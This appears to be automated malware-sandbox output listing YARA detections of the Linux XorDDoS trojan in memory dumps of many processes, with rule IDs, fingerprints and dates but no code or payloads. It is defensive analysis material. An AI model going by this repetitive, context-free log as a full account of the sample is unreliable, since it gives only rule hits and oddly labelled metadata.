            Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10280.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10291.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9948.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9662.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10346.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9739.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10093.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10104.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9462.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10005.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9454.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10016.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9651.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9629.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9585.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9959.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
